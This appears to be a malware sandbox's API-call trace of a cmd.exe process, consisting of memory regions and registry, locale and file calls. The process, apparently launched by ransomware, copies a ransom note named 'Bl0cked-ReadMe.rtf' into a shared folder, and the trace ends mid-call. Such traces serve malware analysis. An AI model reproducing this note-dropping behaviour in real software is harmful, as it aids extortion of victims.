Region: id = 10096 start_va = 
0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10097 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10098 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10099 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10100 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10101 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10102 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10103 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10104 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10105 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10106 start_va = 0x76b40000 end_va = 
0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10107 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10108 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10109 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10110 start_va = 0x400000 end_va = 0x4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10111 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10112 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10113 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10114 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 10115 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 10116 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" 
Region: id = 10117 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 10118 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 10119 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 132 os_tid = 0xfc8 [0127.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf9d4 | out: lpSystemTimeAsFileTime=0x1cf9d4*(dwLowDateTime=0x85ab55a0, dwHighDateTime=0x1d440a9)) [0127.063] GetCurrentProcessId () returned 0xfc4 [0127.063] GetCurrentThreadId () returned 0xfc8 [0127.063] GetTickCount () returned 0x28d41 [0127.063] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf9cc | out: lpPerformanceCount=0x1cf9cc*=18385202338) returned 1 [0127.064] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.064] __set_app_type (_Type=0x1) [0127.064] __p__fmode () returned 0x76b331f4 [0127.064] __p__commode () returned 0x76b331fc [0127.064] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.064] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.064] GetCurrentThreadId () returned 0xfc8 [0127.064] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfc8) returned 0x38 [0127.064] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.064] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.064] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.064] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.065] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf964 | out: phkResult=0x1cf964*=0x0) returned 0x2 [0127.065] VirtualQuery (in: lpAddress=0x1cf99b, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.065] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.065] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.065] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.065] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0127.065] GetConsoleOutputCP () returned 0x1b5 [0127.065] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.065] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.065] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.065] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.066] 
SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.066] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.066] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.066] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.066] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.066] GetEnvironmentStringsW () returned 0x310198* [0127.066] FreeEnvironmentStringsW (penv=0x310198) returned 1 [0127.067] GetEnvironmentStringsW () returned 0x310198* [0127.067] FreeEnvironmentStringsW (penv=0x310198) returned 1 [0127.067] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8d4 | out: phkResult=0x1ce8d4*=0x40) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0xc0, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x0, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegCloseKey (hKey=0x40) returned 0x0 [0127.067] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8d4 | out: phkResult=0x1ce8d4*=0x40) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x0, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.068] RegCloseKey (hKey=0x40) returned 0x0 [0127.068] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886361 [0127.068] srand (_Seed=0x5b886361) [0127.068] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"" [0127.068] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"" [0127.068] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.068] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3118f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.068] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.068] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.068] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.068] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.068] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.068] 
_wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.069] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.069] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.069] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.069] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.069] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.069] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.069] GetEnvironmentStringsW () returned 0x3122e8* [0127.069] FreeEnvironmentStringsW (penv=0x3122e8) returned 1 [0127.069] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.069] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.069] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.069] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.069] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.069] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.069] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.069] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.069] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.069] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.069] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf6a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.069] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf6a0, lpFilePart=0x1cf69c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf69c*="Desktop") returned 0x18 [0127.069] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.070] 
FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x310028 [0127.070] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0127.070] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x310028 [0127.070] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0127.070] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x310028 [0127.070] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0127.070] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.070] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.070] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.070] GetEnvironmentStringsW () returned 0x312b08* [0127.071] FreeEnvironmentStringsW (penv=0x312b08) returned 1 [0127.071] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.071] GetConsoleOutputCP () returned 0x1b5 [0127.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.071] GetUserDefaultLCID () returned 0x409 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="1") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.072] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.073] GetConsoleTitleW (in: lpConsoleTitle=0x3008f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.074] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.074] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.074] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.075] _wcsicmp (_String1="type", _String2=")") returned 75 [0127.075] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0127.075] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0127.075] 
_wcsicmp (_String1="IF", _String2="type") returned -11 [0127.075] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0127.075] _wcsicmp (_String1="REM", _String2="type") returned -2 [0127.075] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0127.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.079] GetFileType (hFile=0x7) returned 0x2 [0127.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0127.131] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf6d8 | out: lpMode=0x1cf6d8) returned 1 [0127.131] _dup (_FileHandle=1) returned 3 [0127.132] _close (_FileHandle=1) returned 0 [0127.132] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0127.132] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf6a8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0127.134] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0127.134] GetConsoleTitleW (in: lpConsoleTitle=0x1cf4d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.134] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0127.134] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0127.134] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0127.134] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0127.135] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.135] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cf03c, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf03c) returned 0x300e90 [0127.135] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0127.135] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0127.135] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0127.135] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cdf48, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0127.136] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0127.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.136] GetFileType (hFile=0x54) returned 0x1 [0127.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.136] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1cdfa0 | out: lpFileSizeHigh=0x1cdfa0*=0x0) returned 0x1632 [0127.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.136] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.136] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.136] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.136] GetFileType (hFile=0x4c) returned 0x1 [0127.136] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.136] GetFileType (hFile=0x4c) returned 0x1 [0127.136] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.136] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, 
lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.137] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.137] GetFileType (hFile=0x4c) returned 0x1 [0127.137] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, 